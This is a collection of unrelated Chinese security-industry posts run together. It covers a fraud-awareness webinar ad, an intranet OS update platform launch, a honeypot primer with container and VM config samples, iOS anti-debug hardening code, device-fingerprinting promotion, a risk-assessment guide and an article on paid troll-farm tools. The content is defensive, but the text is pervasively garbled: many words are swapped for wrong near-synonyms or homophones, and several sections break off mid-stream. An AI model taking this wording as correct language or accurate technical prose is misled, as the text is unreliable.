大家期待已久的第二季第三期，业务平安大讲堂来啦！ 你理解“黑灰产”吗？ 在信息科技反动以及大数据时代彻底到来之前，理解“黑灰产”，器重业务平安，是数字化改革的新型生产因素，也是企业和集体敌对倒退的平安引擎，如何保障业务平安，正确防备“黑灰产”，未然成为了以后各行各业探讨的热门话题。 生存中电信欺骗、钓鱼网站、木马病毒、黑客勒索等利用网络发展违反犯罪活动的“黑灰产”行为无处不在....集体、平安人员以及企业通过深刻学习“黑灰产”倒退，理解其中的危害，能够从源头进步网络安全意识，爱护隐衷，并从本源上做好防控降级、信息安全解决工作。 以及身为平安人员，如何通过溯源剖析多渠道疾速收集并处理黑灰产情报？ 在数字化时代，企业做好业务平安隐衷防护，须要从理解“黑灰产”开始。细数那些年咱们深度揭秘的互联网黑灰产，本次直播将带你走进埋藏在互联网最深处的公开产业江湖。 直播工夫： 下周四（3月30号）下午15：00 本期主讲嘉宾介绍 邓淼 资深网络安全技术专家（顶象特邀嘉宾） 曾在2022顶象首届业务平安保卫战中荣获四等奖，实战经验丰盛，荣获EDUSRC“高级白帽子”名称。曾入职某世界五百强，参加过SDL平安开发治理平台建设，对产品建设前的平安评估有着浓重教训。主攻Web利用平安及黑灰产情报收集，曾多次为“打击罪犯”有着杰出贡献。领有两年平安开发教训，两年浸透测试教训。 直播福利： 本期直播奖品也做了全新降级，直播间不定期会有顶象周边抽奖福利，奖品包含但不仅限于： 1、联结出书的署名权机会；2、现金处分；3、顶象周边。 同时，顶象也欢送各位圈内圈外大佬以及相干客户积极参与到咱们第二季的业务平安大讲堂直播流动中来，有动向的可增加小助手沟通参加。 超多精彩，千万别错过哦！ Tips：本期直播将在顶象视频号&钉钉&B站顶象直播间&CSDN顶象技术直播间多平台同步直播，感兴趣的同学记得肯定要提前锁定直播间哦！ 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

随着数字化的深度推动，信息安全重要性进一步凸显。建设自主可控的国产操作系统，晋升信息安全自主能力，已成为国家重要策略之一。 操作系统平安对计算机系统的整体平安施展着关键作用，各类客户往往须要在第一工夫获取更新与安全补丁，确保零碎始终处于平安状态。 因而如何用最短时间、最高品质、最低危险的形式进行操作系统内网降级，是行业内外广泛关注的课题。 日前，统信软件自主研发的私有化更新治理平台重磅公布，次要面向党政、金融、能源、通信及教育等行业的内网客户，提供桌面操作系统更新降级的资源管理、版本公布、终端治理、仓库治理等管控性能。 传统内网降级面临哪些挑战？ 据统信软件外部统计，目前50%的党政客户有内网降级的需要，60%的行业客户有内网更新降级的需要。 对信息安全性要求较高的党政、金融、能源、通信及教育等行业，因为存在大量的内网（局域网）用户，终端无奈间接从互联网获取零碎更新、安全补丁，仅能以人工形式解决，从而面临一系列挑战： (1)人工更新效率低 内网环境下不足简略高效的更新降级管理手段，只能对终端进行逐个更新降级或采纳技术复杂度高、流程繁琐的内网仓库更新降级，对于应用规模较大的行业客户来说，无疑大大增加了人力老本和工夫老本。 (2)降级危险不可控 首先是更新降级试点验证危险不可控：小范畴试点验证，可无效测验降级后零碎的稳定性、兼容性，但人工选取试点终端难以笼罩全面，且协调耗时费劲，危险不可控；其次是更新降级过程危险不可控：运维人员无奈获取终端降级状态、无奈限度不在降级范畴内的终端降级。 (3)不足平安管控机制 传统内网降级形式，因为获取渠道、环境、人工操作流程无奈全面监控，并且不足平安验证机制，可能存在系统升级包被篡改和病毒侵入的危险。 简而言之，内网传统人工降级形式存在大量的短板。而化繁为简、高效平安的内网降级，正是统信私有化更新治理平台打造的全新价值。 统信私有化更新治理平台助力高效平安内网降级 统信私有化更新治理平台可在不扭转客户原有内网环境安全性的前提下，将统信UOS操作系统更新资源残缺、平安地同步至内网服务中，通过丰盛的产品能力可能实现内网桌面操作系统更新降级管控，晋升更新降级效率，确保更新过程平安可控。 具体来看，统信私有化更新治理平台有以下4大劣势： 高效管控 对于组织架构简单、终端体量宏大的客户，平台反对多仓库多节点的部署形式，无效对降级压力进行分流，实现超大并发量更新降级，晋升更新降级效率；对于多部门、跨区域的状况，平台反对将更新降级权限下放至基层，晋升客户整体管理效率。 快捷部署 客户无需对终端上的统信UOS做任何配置，无需装置客户端，通过设置DNS服务器的域名映射，即可实现终端拜访统信私有化更新治理平台的申请转移，从而实现无感知上线，节俭大量部署、推广老本。 平安稳固 对于网络环境简单的客户，统信私有化更新治理平台提供密钥平安、仓库平安、内网服务平安等多重验证机制，通过SM2/SM3/SM4国密算法和信息签名等相干技术保障系统更新包的完整性和有效性，并对系统更新包流转的整个链路进行严格管控，防止带来安全隐患。 同时，平台通过微服务、负载平衡、多节点部署、主从备份等多种技术手段升高平台运行时的故障危险，无效保障平台运行的稳定性。 无感扩容 随着客户应用统信UOS操作系统的终端设备越来越多，平台撑持能力也须要一直扩容。统信私有化更新治理平台反对无感知扩容，只需减少部署分支仓库节点并在零碎中增加仓库关系，即可疾速投入使用，整个过程对现有零碎无任何影响。 得益于以上劣势，统信私有化更新治理平台可确保更新降级的高效、平安、稳固，真正为客户带来“化繁为简”的应用体验。 统信私有化更新治理平台正式上线 辨认下方二维码立刻理解

蜜罐的简介置信大家对于“蜜罐”的概念，都是理解的。这里简略介绍一下：蜜罐（Honeypot）是指一种平安机制，通过诱骗攻击者进入一个看似实在的零碎环境，从而让攻击者裸露本人的攻击行为和办法，以便分析攻击伎俩并进步网络安全防护的能力。能够将蜜罐比喻为钓饵，就像钓鱼时应用的鱼饵一样，攻击者会被蜜罐中看似易攻打的指标所吸引，进入其中后就会被拦挡或者留下攻打痕迹，为平安人员提供对攻打伎俩和威逼的更深刻理解。 蜜罐的利用模式低交互蜜罐低交互蜜罐（Low-interaction honeypots）：它们是一种虚拟环境，其次要性能是诱骗攻击者，让其置信它们是实在的零碎环境。这种蜜罐通常只模仿了大量服务或利用，例如 HTTP 服务或者 DNS 服务，以保障攻击者进入蜜罐后对实在零碎的影响最小。 低交互蜜罐通常是一些轻量级的虚拟机或容器，次要用于模仿网络服务或应用程序，例如 HTTP、FTP、SMTP、SSH、Telnet 等。这些服务通常只提供了基本功能，仅仅用来吸引攻击者。以下是一个应用 Docker 容器创立 HTTP 低交互蜜罐的示例代码： # DockerfileFROM httpd:2.4# Create a fake admin directoryRUN mkdir -p /usr/local/apache2/htdocs/admin# Copy index.html to the fake admin directoryCOPY index.html /usr/local/apache2/htdocs/admin/index.html这个 Dockerfile 创立了一个基于 Apache HTTP Server 的容器，该容器在 /admin 目录下创立了一个名为 index.html 的文件。这个目录是一个虚伪的目录，用于吸引攻击者。容器启动后，攻击者能够通过拜访 http://[容器IP地址]/admin/index.html 拜访到该文件，然而在此之后所有的申请都将被记录下来，用于平安剖析。 高交互蜜罐高交互蜜罐（High-interaction honeypots）：这种蜜罐是实在的零碎环境，能够齐全模仿一个实在零碎，包含操作系统、应用程序等。攻击者在进入高交互蜜罐后，能够在其中执行实在攻击行为。这种蜜罐能够提供更多的攻打信息和数据 高交互蜜罐通常是一个实在的零碎环境，其中运行着一个残缺的操作系统和应用程序。攻击者能够在其中执行实在攻击行为，这样能够收集到更多的攻打信息和数据。以下是一个应用 VirtualBox 创立 Windows 高交互蜜罐的示例代码： # VagrantfileVagrant.configure("2") do |config| config.vm.box = "microsoft/windows10" config.vm.provider "virtualbox" do |v| v.memory = 2048 v.cpus = 2 end # Enable RDP config.vm.provision "shell", inline: "Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -Name 'UserAuthentication' -Value 1 -Force" # Enable Windows Firewall logging config.vm.provision "shell", inline: "Set-NetFirewallProfile -LogFileName C:\\Windows\\firewall.log -LogAllowed True -LogDropped True -LogMaxSizeKilobytes 102400" # Install honeypot software config.vm.provision "shell", path: "honeypot-install.ps1"end这个 Vagrantfile 创立了一个 Windows 10 的虚拟机，并且应用了 VirtualBox 作为虚拟化平台。虚拟机配置了 2GB 内存和 2 个 CPU 外围，以保障运行效率。蜜罐装置了 RDP 和 Windows 防火墙，并且装置了一些蜜罐软件，以收集攻打信息和数据。 ...

一个对于iOS加固的小故事传说，有这么一家公司，他们应用了一种独特的iOS加固办法：在应用程序中增加一个虚拟机，以便在利用程序运行时爱护其代码。咱也不晓得这具体的实现形式，然而，不得不夸一句：人才！ 当然，人家苹果公司是不认的，苹果公司认为他们违反了利用程序开发规定，所以这家公司的应用程序最终被禁止在App Store上公布。 多年前的故事了，咱们明天只讲惯例的几种加固办法。 iOS加固的意义最近有很多人征询iOS加固到底有什么用？app是否须要加固？ 其实，真的因人而异，iOS次要作用是进步应用程序的安全性，避免黑客攻击和逆向工程。而“黑客攻击和逆向工程”会： 1.获取未经受权的拜访：黑客攻击的一个常见目标是获取未经受权的拜访，例如入侵零碎、窃取明码或身份验证凭据等。 2.窃取机密信息：黑客攻击也可能是为了窃取敏感信息，例如信用卡号码、医疗记录或政府秘密等。 3.毁坏或破解零碎：黑客攻击可能是为了毁坏或破解零碎，例如通过恶意软件毁坏计算机系统、障碍网络连接或篡改数据等。 4.取得商业劣势：逆向工程的一个常见目标是为了取得商业劣势。例如，逆向工程能够帮忙竞争对手剖析您的产品设计和工艺，从而进步他们的产品质量和性能。 5.了解和批改软件：逆向工程可能是为了了解和批改软件，例如帮忙诊断和解决软件缺陷，或者为了加强软件的性能和性能等。 因而，对于集体来说，如果app没有太大的危险，根本能够不思考加固问题。然而对于企业而言，尤其是银行、金融、车企以及电商、游戏等行业，应用程序的安全性须要更加器重。 常见的iOS加固技术上面，咱们将介绍几种常见的iOS加固技术，而后提供相应的代码演示。 1. 防调试防调试是一种常见的iOS加固技术，它能够检测应用程序是否正在被调试，如果是，则会采取相应的措施，例如解体或退出应用程序。上面是一个应用ptrace()函数实现防调试的代码示例： #include <unistd.h>#include <sys/syscall.h>#include <dlfcn.h>#include <string.h>int anti_debug(void) { void *handle = dlopen(0, RTLD_GLOBAL | RTLD_NOW); if (handle) { int (*ptrace_ptr)(int, pid_t, caddr_t, int) = dlsym(handle, "ptrace"); if (ptrace_ptr) { if (ptrace_ptr(PT_DENY_ATTACH, 0, 0, 0) == -1) { dlclose(handle); return 1; } } dlclose(handle); } return 0;}解释一下：这段代码首先应用dlopen()函数关上一个指向应用程序的句柄，而后应用dlsym()函数获取ptrace()函数的地址，最初调用ptrace()函数将PT_DENY_ATTACH标记设置为避免调试。如果ptrace()函数返回-1，则阐明应用程序正在被调试，这时能够采取相应的措施，例如退出应用程序。 2. 混同混同是指对应用程序的代码和数据进行混同，以使其难以被了解和破解。上面是一个应用LLVM混同器进行代码混同的代码示例： int main(int argc, char *argv[]) { printf("Hello, world!\n"); return 0;}应用LLVM混同器能够将下面的代码混同成以下代码： ...

3 月 24 日，由龙蜥社区平安委员会、商密软件栈和云原生秘密计算三大平安方向 SIG 主办的系统安全 MeetUp，将于北京东隅酒店线下举办，流动邀请了 Arm、阿里云、海光、Intel、统信软件、AMD、达摩院、蚂蚁团体、中科微澜及北京大学等多位专家、学者和 KOL，将围绕 OS 平安、全栈国密、秘密计算三大畛域开展主题分享，为大家解读不同场景下的优良实际案例。本次 MeetUp 上也将重磅公布两大平安技术实际白皮书：《商用明码技术最佳实际白皮书》、《云原生秘密计算最佳实际白皮书》，敬请期待。 欢送各位报名加入龙蜥社区系统安全 MeetUp，在这里不仅能够理解到龙蜥操作系统平安架构和国密算法解决方案，还能够跟秘密计算领域专家面对面交换。不管您是操作系统平安从业者、算法开发者或者技术爱好者，都能够报名参加此次技术交换。 本次 MeetUp 具体议程见下： 留神：可扫描海报二维码间接报名，本次专场只对外开放 50 个报名名额，感兴趣的还请速速报名~

顶象进攻云业务平安核心公布的一项数据显示，2022年社交平台的业务危险，三成来自安卓平台。安卓平台是如何统计进去的？其中，设施指纹是重要的一项。 什么是设施指纹？设施指纹采集设施各项信息，而后赋予设施惟一的标识，并通过多种关联和类似查找算法来保障这个标识的稳定性。通过设施采集上报的信息数据，可能剖析出一个设施的型号、零碎、版本、网络、账号、地位、沉闷工夫等等，刻画出设施的平面形象，为数据分析、风控决策、模型建设提供撑持。 基于设施指纹能够监测设施的运行状态，能够发现root（非法读取文件、反平安检测）、自动化工具（批量注册、流动舞弊）、模拟器（主动注册小号、秒杀）、多开（虚伪舞弊、养号、）、改机、群控（薅羊毛、虚伪流量），App重打包（植入广告、破解性能限度）等异样行为，辅助风控反欺诈体系在注册、登录、营销、交易、充值、渠道推广等业务场景中，辨认出虚伪注册、盗号、歹意登录、薅羊毛、推广舞弊、批量养号等欺诈危险，帮忙企业断定，拜访业务的设施是失常用户还是歹意用户。 辨认机器攻打。机器攻打/脚本攻打个别是通过编写自动化脚本或工具，批量化和自动化的向指标网站发动申请，通过应用设施指纹终端危险辨认能力，可能很好地辨认是否机器、脚本发动的申请。 辨认虚伪注册/歹意登录。利用设备指纹技术，能够辨认模拟器上的账号注册、同设施肯定时间段内的大量注册，以及注册的设施是否有高风险。同样，在登录场景无效辨认对立设施上频繁登录尝试、撞库危险，记录辨认登录设施是否频繁切换等。 辨认多账号绑定。在营销流动中，个别流动规定会限度同设施同账号只能加入一次。通过设施指纹技术能够做疾速辨认是设施上是否绑定多个账号，同一个账号是否在多个设施上登录等。 辨认渠道舞弊。在利用推广、展现广告等场景下，黑灰产会通过各种技术工具伪造数据、流量舞弊，骗取推广费用。通过设施指纹技术能够及时辨认虚伪机器、真机虚伪装置等，从而无效地追踪渠道流量和体现。 辨认模拟器/调试危险。设施指纹技术可能无效检测到设施终端环境和运行期危险，如，模拟器、越狱、调试、注入、攻打框架等。 业务平安情报的六大功能模块近日，顶象进攻云业务平安情报上线了首个“歹意设施指纹”查问库，只须要输出设施指纹信息，就能够查问该设施的操作系统、设施型号、拜访工夫、IP地址、起源乃至Token信息。想体验的用户，只须要登录顶象进攻云，点击左侧“设施指纹-设施信息查问”，即可应用。 “歹意设施指纹”查问库是顶象进攻云业务平安情报“设施危险核验”模块重要组成部分。设施危险核验次要是通过机器学习平台及关联网络，利用标签流传算法、Louvian社区发现算法基于决策树的规定提取剖析、聚类分析、分类剖析，对亿级设施数据进行剖析，对设施践行危险核验，对设施进行评分，并挖掘出设施关联团伙信息、关联危险IP、近7至30天及最近一次的回绝率、占比等指标，从而无效晋升危险辨认能力。 除设施危险核验外，还有行业情报、IP危险核验、电诈危险核验、涉赌涉诈核验、交易危险核验等服务模块。 行业危险情报。来自黑灰产社区社群、暗网论坛、守法违禁网站和App的监测，以及打码平台、众包平台、行业非危险数据的共享的30000+危险源，通过智能平台实时剖析，造成笼罩威逼的事件背景、攻打体现、威逼剖析、进攻倡议、进攻计划、降级迭代，通过进攻伎俩实时推送，实现从感知到进攻0空档，晋升企业反欺诈效率。 IP危险核验。利用机器学习、关联网络技术对对千万级IP数据进行剖析和开掘，输入IP地址评分，挖掘出关联危险设施、关联危险IP、关联群体、近7-30天和最近一次的团伙回绝率、占比等指标，助力反欺诈团队把握黑产行为，制订针对性防控策略。 电诈危险核验。联合以后《反电信网络欺骗法》各项要求，利用机器学习和关联网络技术，在银行卡户、交易、转账等场景中，核验相干人员的手机号码，验证单方手机号是否涉诈。同时，能够对手机号码进行危险评分。 涉赌涉诈核验。通过对涉赌涉诈网站/APP监测，基于同源DNS、CDN服务联合搜索引擎、论坛波及的赌博、欺骗网站进行拜访性检测，对涉赌涉诈特色辨认，帮忙银行发现涉赌账户信息。 交易危险核验。基于行内数据联合涉赌涉诈特色库，利用机器学习和关联网络技术，开掘交易网络中的涉诈、洗钱、涉赌的账号，并对并对账户进行危险评级。 顶象业务平安情报领有 30000+危险源，蕴含来自对黑灰产社区社群、暗网论坛、守法违禁网站和App的监测，以及打码平台、众包平台、行业非危险数据的共享等。基于对危险数据的人群画像、行为评分、关联关系剖析、团伙欺诈开掘、场景危险特征分析，以及专家业余教训的判断和定位后，提炼总结剖析出电信欺骗危险、IP地址危险、设施危险、涉毒涉诈危险、交易危险以及不同行业危险的业务平安情报，为平安人员提供及时、精确、无效的情报内容，帮忙平安人员零碎掌握业务平安态势、威逼门路、影响范畴等，剖析挖掘出攻打特色、潜在隐患，从而及时无效晋升平安应急响应能力，制订迷信无效的防控策略。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

什么是危险评估？在信息安全畛域，危险评估是指通过对一个零碎、网络或应用程序进行安全漏洞、威逼和脆弱性的评估，确定可能影响这些零碎、网络或应用程序的平安危险的过程。危险评估是信息安全治理的重要组成部分，它能够帮忙组织理解其信息资产的平安情况，以及制订和施行适当的安全措施来爱护这些资产免受攻打和损失。危险评估的目标是什么危险评估的目标是确定信息系统、网络或应用程序可能面临的平安危险，并为组织提供无关安全措施的倡议，以确保零碎、网络或应用程序的安全性。辨认潜在的平安危险：通过评估零碎、网络或应用程序的安全性，确定可能存在的安全漏洞、威逼和脆弱性，并评估它们对组织的平安和业务经营的影响。理解平安需要：依据评估后果，理解组织所面临的平安危险和需要，为制订和施行适当的安全策略和控制措施提供反对。建设安全意识：通过对平安危险进行评估和治理，帮忙组织建设安全意识和文化，进步员工对信息安全的器重和意识。恪守法规和规范：通过对平安危险进行评估和管制，确保组织恪守相干的法规和规范，例如《中华人民共和国网络安全法》《信息安全技术 根本要求》《网络安全等级爱护治理方法》等。进步客户信任度：通过建设无效的平安治理和控制措施，进步组织的信任度和名誉，加强客户对组织的信赖。危险评估如何施行呢？确定评估指标：确定要评估的零碎、网络或应用程序，并确定评估的目标、范畴和时间表。资产辨认：识别系统、网络或应用程序中的所有资产，包含硬件、软件、数据和人员，并建设资产清单。威逼建模：通过剖析零碎、网络或应用程序可能面临的威逼，并确定这些威逼的起源、类型和潜在影响。脆弱性评估：应用各种平安测试工具和技术对系统、网络或应用程序进行脆弱性评估，以确定它们是否存在安全漏洞或易受攻击。危险剖析：联合威逼建模和脆弱性评估的后果，对系统、网络或应用程序的平安危险进行剖析和评估。危险解决：确定和施行适当的控制措施来升高或打消危险，例如修补破绽、施行安全策略、装置防火墙和加密措施等。监控和评估：建设监控和评估机制，定期对系统、网络或应用程序进行审查和评估，以确保其平安状态。危险评估如何计算？危险评估通常波及到三个因素：威逼、破绽和影响。计算危险的过程能够分为以下几个步骤：确定威逼：辨认可能会影响组织信息系统、网络或应用程序的威逼，如黑客攻击、病毒、网络钓鱼等。确定破绽：确定可能被攻击者利用的破绽，包含零碎、网络或应用程序的软件破绽、配置谬误、访问控制问题等。确定影响：评估威逼和破绽对组织的影响水平，包含数据泄露、零碎解体、业务中断等。计算危险等级：综合思考威逼、破绽和影响等因素，计算危险等级。通常采纳数值或等级来示意危险等级，例如低、中、高或1~10等级。制订安全控制措施：依据危险等级，制订相应的安全控制措施，以升高危险。安全控制措施可能包含增强访问控制、修补破绽、增强数据备份等。危险评估报告危险评估报告是评估过程中的重要成绩之一，能够帮忙组织理解以后的平安情况和面临的危险，为制订安全控制措施提供根据。简介：介绍危险评估的目标、背景、范畴和办法，以及报告的构造和内容。危险评估过程和办法：形容危险评估的过程和办法，包含威逼辨认、破绽评估、影响评估、危险计算等，以便组织理解评估的过程和办法。危险评估后果和剖析：形容组织面临的次要威逼、破绽和可能带来的影响，以及计算出的危险等级和危险矩阵。对评估后果进行剖析，包含辨认和分类危险，确定危险等级和对组织的影响水平，对危险进行定量和定性分析等。安全控制倡议：依据危险评估后果，提出相应的安全控制倡议，以升高危险。安全控制倡议应该具备可行性、具体性和可操作性，便于组织施行。论断：总结危险评估的后果和倡议，强调危险评估的重要性，并提出倡议和将来工作方向。

2023年“央视315晚会”曝光了一些网络平台明火执仗地售卖直播水军，人气、播放量、点赞、评论等等，均可24小时自助下单，达成衬托直播间氛围的目标。依据报道，某公司推出额云控系统，一台手机，可同时操控200到20000台手机。为了让水军看起来更像实在用户，该云控系统还能当时设定批次、进入工夫以及不同的发言内容等进入直播间，甚至还能够去竞争对手的直播间，主动投诉甚至争光。 据最新报道，当地联结执法组第一工夫赶赴现场，已对该公司进行查封，对所有手机和其余设施等现场封存。该公司负责人已被公安机关管制。后续将依法依规予以严查严处，并及时向社会通报。 除了刷量，“网络水军”还有什么危害所谓“网络水军”，又名“网络枪手”，指的是在网络中针对特定内容公布特定信息的、被雇佣的网络写手，由最后简略的发帖“灌水”逐渐倒退而来，通常沉闷在电子商务网站、论坛、微博等社交网络平台中。通过伪装成一般网民或消费者，通过公布、回复和流传贴文等对失常用户产生不利影响。 “网络水军”的危害次要体现在三方面： 一是制作虚伪流量，毁坏行业生态。网民的浏览、转发、评论、点赞数量已渐成为公众掂量其认可度的重要指标，“网络水军”通过有偿刷量服务，在视频、直播、资讯、电商等服务下刷量，满足一些企业和集体的流量指标。 二是制作虚伪评论，毁坏经营秩序。商家为晋升商品或店铺的信用度美誉度，通过各种伎俩，批量制作虚伪交易、虚伪订单、虚伪评论、虚伪评分等，以晋升店铺或商品的排名，获取消费者信赖，误导消费者购买以次充好、以劣充优商品。 三是假造虚伪信息，制作网络矛盾。随着自媒体、短视频和直播平台的疾速衰亡，一些不法分子经营大量账号成心假造虚伪信息“造热点”“蹭热点”，借此吸引眼球、收割流量、牟取利益，严重危害网络生态。 在互联网上数量就是流量，流量意味着影响力、权力、收益。“网络水军”的行为毁坏了偏心、公正、公开的“三公”规定，给用户造成误导，影响客户决策，毁坏网络空间秩序，净化网络生态，不仅侵踏消费者权利，也影响企业品牌形象，侵害行业衰弱倒退。 揭秘“网络水军”应用的舞弊工具当虚伪数字成了一门需要，“网络水军”变成了一个分工明确的生意。以“刷量”为例，“网络水军”的大体运作过程如下： 首先，通过电商、社群、论坛、社区揽客接单。 其次，安顿刷量打算； 而后，零碎派单给刷手； 最初，执行刷量。 “刷量”有两种形式：人刷和机刷。“人刷”次要是通过社群、工作平台等招募人员进行采纳人海战术实现投票、加粉、下载、刷浏览，这不仅须要消耗大量工夫和精力，更须要投入大量资金。“机刷”就是次要利用软件、脚本，应用脚本程序批量刷票一键刷票、投票、刷粉、刷浏览，投入成本低，见成果快。 “网络水军”进行机刷时，会用到如下舞弊工具： 黑卡。账号注册须要借助电话卡，黑灰产利用黑卡进行注册，以暗藏实在身份、躲避对账号管制主体的溯源。黑卡来自通过拖库撞库、木马、钓鱼等形式从网上收集大量身份信息，而后通过黑卡运营商批量验证失去实名卡；实名制治理不够谨严的物联网卡和虚构运营商卡，以及海内购得的境外手机卡等。 秒拨IP。IP 地址就是用户上网时的网络信息地址。黑灰产应用秒拨 IP 的工具，可能主动调用全国甚至国外的动静IP地址，具备主动切换、断线重拨、主动清理浏览器的Cookies缓存、虚构网卡信息等性能，可能疾速无缝切换国内国外不同区域的 IP 地址。 模拟器。GPS 定位就是用户应用网络服务时所处的地理位置信息，黑灰产利用模仿软件、第三方工具，就能够扭转所在位置的经纬度，能够实现任何中央的霎时“穿梭”。 改机工具。设施的型号、串码、IMEI等具备唯一性。黑灰产利用改机工具可能从零碎层面劫持设施接口，当利用调用这些接口来获取设施的各项参数时，获取到的都是改机工具伪造进去设施的属性信息。一般来说，2-3分钟改机工具就能实现1000个设施属性。 注册机。 注册是创立一个账号的要害流程。黑灰产利用注册机可能进行批量自动化账号注册，从而注册几百乃至几万个账号，以实现大量抢货、囤货。 接码平台。注册、登录、抢购、交易等环节都有验证码的校验，为了疾速抢购，黑灰产会利用引入机器学习和神经网络等人工智能技术来智能辨认图片中的验证码因素，绕过验证码校验。 群控。黑灰产利用群控能够实现一台电脑管制上几十、几百部乃至几千台设施，进行对立的注册、登录、抢购、下单等。群控还提供模仿定位、摇一摇、批量导入通讯录等性能，还能够进行音讯推送。2023年“央视315晚会”曝光的某公司云控系统就是该工具。 黑设施。也就是黑灰产应用的智能手机、平板电脑等设施，次要用来下载App、注册登录账号、执行各类工作的载体，是黑灰产不可或缺的设施。黑灰产的设施次要两个起源：对立购买某个性价比高的新手机、在二手市场购买旧手机。其中，二手手机因为保留有原客人的账号及隐衷信息更受黑灰产青眼。 揭秘“网络水军”鲜为人知的技术特色业务链条长，危险破绽多，单点防控难度大。黑灰产手握大量账号，个体行为非法、群体非法，辨认难度大。攻击者中既有不良用户，又有业余黑灰产，还有可能是歹意同行。业余工具不断更新，新伎俩层出不穷，反抗进攻难度大。 国内首部业务平安图书《攻守道——企业数字业务平安危险与防备》中，具体列举了“网络水军”的几个显著特色。 IP地址高度对立或频繁更换。失常用户来自四面八方，注册登录操作的IP地址各不相同。而“网络水军”们的注册设施和软件通常应用同一个宽带线路接入网络，注册和登录平台的IP地址根本固定；或者为了躲避平台的防控，“网络水军”应用拨号VPN软件或IP变动软件，须要短时期高频切换IP，以绕过平台对IP地址的限度。 繁多设施上有多个账号。“网络水军”的这些账号别离安置在不同设施上，一台设施上装置了多个账号，通过群控、软件等管制账号，因而存在同一台设施存在多账操作行为。 繁多账号短时间内大量参加流动。在具体操作行为上，同一账号，在肯定时间段内加入大量流动，具备只为流动而生的特色。 账号注册登录行为特地晦涩。失常用户注册登录时，要人工输出用户名、明码、手机号，收到验证码后还要再次手动输出，整个过程不法则且有肯定提早，过程中可能会因为不相熟规定或因为其余事件而耽误停止。而“网络水军”应用自动化的软件工具进行账户注册，流程化作业如行云流水般零打碎敲，速度和节奏上是人工速度的数倍。 设施天文特色长时间无变动。失常用户注册登录时，可能坐在椅子上、躺在床上、坐在车上，手机会依据动作进行不同角度的调整，手机的程度高度也会不停地调整。“网络水军”应用软件操控批量设施，这些设施大多是搁置在不同机架上，24小时放弃角度和水平线无变动。 操控的手机型号比拟繁多。“网络水军”为了牟利，会尽量升高设施投入老本以实现利润最大化，因而价格低廉的手机或者二手手机是他们重要的设施起源。 监管部门针对“网络水军”的治理互联网经济是诚信经济，只有流量不要品质、只有热度不要态度、只看商业价值不看社会价值等做法，不仅侵害用户的合法权益，也会侵蚀互联网的信赖基石，无异于饮鸩止渴。治理“网络水军”，须要政府、平台、网友群策群力，独特参加。 2022年8月23日，地方网信办相干负责人介绍，网信办联合每年发展的“清朗”系列专项口头，将网络群组、网站论坛、电商、小程序等平台作为治理网络暴力、网络水军乱象的一个重点。 2022年11月，地方网信办印发《对于切实加强网络暴力治理的告诉》，提出要建立健全网暴预警预防机制，增强内容辨认预警、构建网暴技术辨认模型、建设涉网暴舆情应急机制。 2022年，全国公安网安部门紧紧依靠“净网2022”专项口头，依法严厉打击整治“网络水军”违法犯罪流动，共侦办“网络水军”相干案件550余起，敞开“网络水军”账号530余万个，关停“网络水军”非法网站530余个，清理网上守法有害信息56.4万余条。 往年“两会”上公布的《最高人民法院工作报告》显示，过来5年，全国法院依法惩治信息网络立功，审结电信网络欺骗及关联犯罪案件 22.6万件。审理涉网络 “水军”、网络 “黑公关”等案件，宽大分布虚伪信息、危害网络生态的犯罪行为，决不允许网络空间沦为法外之地。 第一，增强法律震慑。针对“网络水军”歹意行为，《网络安全法》、《个人信息保护法》、《互联网信息服务治理方法（订正草案征求意见稿）》、《对于进一步压实网站平台信息内容主体责任的意见》、《对于切实加强网络暴力治理的告诉》等提供了无力的法律依据和撑持，加大对组织雇佣网络水军的幕后黑手执法力度，明确界定规范，施展法律应有的震慑力和约束力。 第二，强化平台治理。各网站平台都已上线公示账号IP地址的归属地、网络账号所属MCN机构信息等性能，为网友监督发明了条件。在此基础上，须要加大守法违规账号查处力度。严格审核平台内容，根除网络水军滋生土壤，逐渐压缩网络水军的生存空间。 第三，晋升技术防护。借助大数据、人工智能等技术，对“网络水军”的行为进行全流程的监测，增强对水军账号进行辨认剖析和行为监测，及时对歹意行为进行预警和处理。向面临危险的平台和用户发送危险提醒，疏导用户开启“一健防护”性能等。 平台如何无效自动化辨认“网络水军”针对“网络水军”批改IP和GPS的辨认。辨认客户端的设施指纹是否非法，是否存在注入、hook、模拟器等危险。与真机的比拟，模拟器有些是无奈实现的，例如运营商信息、零碎信息、硬件信息、用户行为、CPU指令以及模拟器特色无效分辨模拟器舞弊行为。 针对“网络水军”设施的辨认。辨认客户端的设施指纹是否非法，疾速辨认刷机改机、Root、越狱、劫持注入等危险。 针对“网络水军”账号辨认与检测。疾速辨认同设施屡次激活、同设施关联IP行为异样，同IP短时间大量汇集、同一渠道中老设施型号占比异样、同一渠道中老操作系统占比异样等维度；建设本地名单动静经营保护机制，基于注册数据、登录数据、激活数据，积淀并保护对应黑白名单数据，包含用户ID、手机号、设施等维度的黑名单。 针对“网络水军”账号异行为检测。基于用户行为进行策略布控，针对同设施切换大量账号进行订单发动的账号进行布控。 针对“网络水军”行为变动的剖析与预测。线上数据有肯定积攒当前，通过风控数据以及业务的积淀数据，对注册、登录、下单、抢购行为进行建模，模型的输入能够间接在风控策略中应用。 针对“网络水军”绕过验证码的防备。通过晋升验证因素辨认难度，高频率地更新验证图片库，并采集验证环境信息，判断实现验证时的验证环境信息和 token，及时发现异常和危险操作。 技术上如何无效防控“网络水军”基于“网络水军”的特色和业务防护策略，各平台需构建一个笼罩多渠道全场景，提供多阶段防护的平安体系。该体系买通平台的前台、中台和后盾，笼罩各渠道平台和各业务场景，提供威逼感知、平安防护、数据积淀、模型建设、策略共享等平安服务，可能满足不同业务场景，领有各行业策略且可能基于本身业务特点实现积淀和更迭演进，实现平台的精准防控。 事先 1、别离从业务规定、业务逻辑、业务平安防控措施、业务平安应急预案等方面做好评估和筹备，保障业务和零碎的公平性。例如，业务零碎上短少平安组件，在上线时就须要减少平安组件的应用。提前准备应急预案，一旦发现业务有破绽或被歹意拜访，能够及时疾速进行应急预案，利用提前制订好的规定，进行防护。 2、基于业务平安情报，发现新危险新变动，帮忙企业减速对行业中新型威逼的布防速度和能力，帮忙企业提前获取黑灰产动员威逼的工具、门路、用意等信息，勾画出攻击者画像。 事中 ...

